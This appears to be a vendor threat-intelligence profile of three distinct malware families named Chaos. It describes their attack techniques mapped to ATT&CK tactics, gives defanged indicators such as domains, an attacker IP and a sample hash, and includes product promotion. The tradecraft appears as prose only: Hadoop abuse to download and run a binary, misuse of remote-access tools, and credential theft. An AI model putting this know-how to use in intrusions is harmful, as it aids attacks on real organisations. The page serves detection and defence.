Chaos
Chaos refers to multiple distinct malware families/operations in the provided content, so attribution must be handled carefully. The content most strongly supports three separate usages: (1) a ransomware builder/ransomware family monitored since June 2021; (2) a ransomware-as-a-service (RaaS) operation active since February 2025; and (3) a Go-based cross-platform botnet/malware family first documented in September 2022.
For the 2021-era ransomware family/builder, Chaos was described as an in-development ransomware builder offered for testing on an underground forum. Splunk reporting states it has been monitored since 2021, targets Windows systems and networks, can enforce single-instance execution, delay execution for defense evasion, establish persistence through the Windows registry and Startup folder, and copy itself to root drives and %appdata%. Related detection content associates it with behaviors such as file encryption activity, ransom note creation, deletion of shadow volume storage, registry modification, Startup-folder drops, removable-media/root-drive replication, and malicious .url shortcut creation. Fortinet reporting in the content describes a later C++ variant (“Chaos-C++”) targeting Windows that adds destructive capabilities, including irrevocable deletion/overwriting of large files rather than recoverable encryption and clipboard manipulation for cryptocurrency theft. The content also states that Onyx ransomware is based on Chaos ransomware.
For the 2025 RaaS operation, Chaos is described as a distinct ransomware-as-a-service group first observed in February 2025, likely composed of former BlackSuit/Royal members, with moderate-confidence reporting linking it to ex-BlackSuit/ex-Royal/Conti lineage. This operation uses an open affiliate model and has been described as conducting double extortion and, in some reporting, triple extortion by combining data theft, encryption, and DDoS threats. It mostly targets large organizations in the United States and is characterized as opportunistic big-game hunting. Reported intrusion patterns include spam flooding and voice phishing or Microsoft Teams/Quick Assist social engineering, use of remote management tools such as AnyDesk, ScreenConnect, OptiTune, Syncro RMM, Splashtop Streamer, and DWAgent, reverse SSH tunnels over port 443, credential theft with Mimikatz and Kerberoasting, lateral movement via RDP and Impacket, and exfiltration with GoodSync renamed to wininit.exe. Its encryptor reportedly supports Windows, Linux, ESXi, and NAS, uses Curve25519 ECDH and AES-256 with per-file unique keys, appends the .chaos extension, and drops README.chaos.txt/readme.chaos.txt ransom notes. The content also notes repeated false-flag use of Chaos branding by Iran-linked MuddyWater/MOIS activity in early 2026, where attackers used Chaos leak-site/extortion branding but did not deploy encryption.
For the 2022 botnet/malware family, Chaos was first documented by Lumen Black Lotus Labs in September 2022 as a Go-based cross-platform malware targeting Windows and Linux, historically focused on routers and edge devices. Reported capabilities include remote shell command execution, deployment of additional modules, SSH brute-force propagation, exploitation of known router CVEs, cryptocurrency mining, and DDoS attacks over HTTP, TLS, TCP, UDP, and WebSocket. Multiple reports assess it as likely an evolution of the Kaiji botnet. Newer 2026 variants expanded to misconfigured cloud/Linux server environments, including exploitation of misconfigured Hadoop instances by creating a malicious application that downloads and executes a Chaos binary, then deletes it from disk. Updated Linux ELF variants reportedly removed some older SSH spreading/router exploitation functions, retained persistence via systemd and keep-alive scripts, and added SOCKS/SOCKS5 proxy capability for traffic relaying and internal-network pivoting. Infrastructure and indicators mentioned in the content for this botnet variant include pan.tenire[.]com, gmserver.osfc[.]org[.]cn, port 65111, attacker IP 182[.]90.229.95, and sample hash ae457fc5e07195509f074fe45a6521e7fd9e4cd3cd43e42d10b0222b34f2de7a. Because the content conflates unrelated malware families sharing the same name, analysts should distinguish the 2021 Chaos ransomware/builder, the 2025 Chaos RaaS operation, and the 2022 Go-based Chaos botnet/malware family.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
3 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Nation-state hackers from Iran are deploying the Chaos ransomware as cover for alleged espionage and data theft operations... The Chaos ransomware operation has existed since February 2025...
A newly emerged ransomware-as-a-service (RaaS) gang called Chaos is likely made up of former members of the BlackSuit crew... Chaos, which sprang forth in February 2025...
A newly emerged ransomware-as-a-service (RaaS) gang called Chaos is likely made up of former members of the BlackSuit crew... Chaos, which sprang forth in February 2025...
Techniques & procedures
27 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
2 techniquesOne of the more interesting functions of Chaos version 1.0 was its worming function, which allowed it to spread to all drives found on an affected system. This could permit the malware to jump onto removable drives and escape from air-gapped systems.
Darktrace said it identified the new variant targeting its honeypot network last month, a deliberately misconfigured Hadoop instance that enables remote code execution on the service. In the attack spotted by the cybersecurity company, the intrusion commenced with an HTTP request to the Hadoop deployment to create a new application.
Execution
3 techniquesChaos is a cross-platform malware that can run remote shell commands...
The application, for its part, embedded a sequence of shell commands to retrieve a Chaos agent binary from an attacker-controlled server ('pan.tenire[.]com'), set permissions to allow all users to read, modify, or run it ('chmod 777'), and then actually execute the binary and delete the artifact from disk to minimize the forensic trail.
One honeypot in that network runs Apache Hadoop, an open-source distributed data processing framework, deliberately misconfigured to allow remote code execution.
Persistence
1 techniquePrivilege Escalation
1 techniqueStealth
2 techniquesDefense Impairment
1 techniqueThis application then retrieves a Chaos agent binary from an attacker-controlled server, sets permissions to allow execution, and runs the binary...
Credential Access
2 techniquesChaos is a cross-platform malware that can run remote shell commands, deploy additional modules, propagate via SSH brute-forcing...
The internal namespace was restructured and several functions were rewritten or removed, including the SSH brute-forcing spreader...
Discovery
1 techniqueFor example, it searched the following file paths and extensions to infect: Directories \Contacts \Desktop \Documents \Downloads ...
Lateral Movement
3 techniquesIt also has the kind of tradecraft defenders should not shrug off: social engineering, remote-management abuse, payload retrieval, staging, and leaked data.
Chaos was first documented by Lumen Black Lotus Labs in September 2022, describing it as a cross-platform malware capable of targeting Windows and Linux environments to run remote shell commands, drop additional modules, propagate to other hosts by brute-forcing SSH keys
Command and Control
5 techniquesThe command-and-control server is reached through an embedded domain, gmserver[.]osfc[.]org[.]cn, which at the time of analysis resolved to an IP address geolocated to Hong Kong.
The new 64-bit ELF binary has removed SSH propagation and router exploit functions, replacing them with a SOCKS proxy feature to ferry traffic and conceal malicious activity.
When the malware receives a StartProxy command from the command-and-control (C2) server, it will begin listening on an attacker-controlled TCP port and operates as a SOCKS5 proxy.
Taking their place is a new SOCKS proxy feature that allows the compromised system to be used for ferrying traffic, thereby concealing the true origins of malicious activity and making it harder for defenders to detect and block the attack.
It also has the kind of tradecraft defenders should not shrug off: social engineering, remote-management abuse, payload retrieval, staging, and leaked data.
Exfiltration
2 techniquesSmyth Companies, LLC has failed to protect its infrastructure. We have successfully exfiltrated high...
We are announcing a major security breach and data exfiltration from Flad Architects...
Impact
6 techniquesInstead of encrypting files (which could then be decrypted after the target paid the ransom), it replaced the files’ contents with random bytes, after which the files were encoded in Base64. This meant that affected files could no longer be restored
With version 3.0, the Chaos ransomware builder gained the ability to encrypt files under 1 MB using AES/RSA encryption... The fourth iteration of Chaos expands the AES/RSA encryption by increasing the upper limit of files that can be encrypted to 2 MB.
The second version of Chaos added advanced options for administrator privileges, the ability to delete all volume shadow copies and the backup catalog, and the ability to disable Windows recovery mode.
In addition, it gives the ransomware builder’s users the ability to add their own extensions to affected files and the ability to change the desktop wallpaper of their victims.
Chaos is a cross-platform malware that can run remote shell commands, deploy additional modules, propagate via SSH brute-forcing, mine cryptocurrency...
Chaos is a cross-platform malware that can run remote shell commands, deploy additional modules, propagate via SSH brute-forcing, mine cryptocurrency, and launch DDoS attacks.
IOCs tracked for this family
88 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
46 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Chaos is a ransomware-as-a-service operation associated with double-extortion attacks involving data exfiltration and file encryption. In the reported intrusion, its branding and artifacts were used as a false flag, but no encryption occurred.
Ransomware brand used as cover for espionage and data theft operations. In the described incident, attackers conducted social engineering via Microsoft Teams, gained access, stole data, extorted the victim, and notably did not encrypt files, suggesting use of the ransomware label to obscure attribution and operational intent.
A ransomware/RaaS brand used here as cover for extortion and leak-site pressure; in this incident it was presented as the apparent culprit, but investigators found no actual file encryption or ransomware deployment.
Chaos is a ransomware-as-a-service operation active since February 2025, specializing in big-game hunting attacks, double/triple/quadruple extortion, and targeting high-profile organizations. In this incident, its branding and extortion infrastructure were used as cover, while the operation itself did not follow a typical encryption-focused ransomware workflow.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.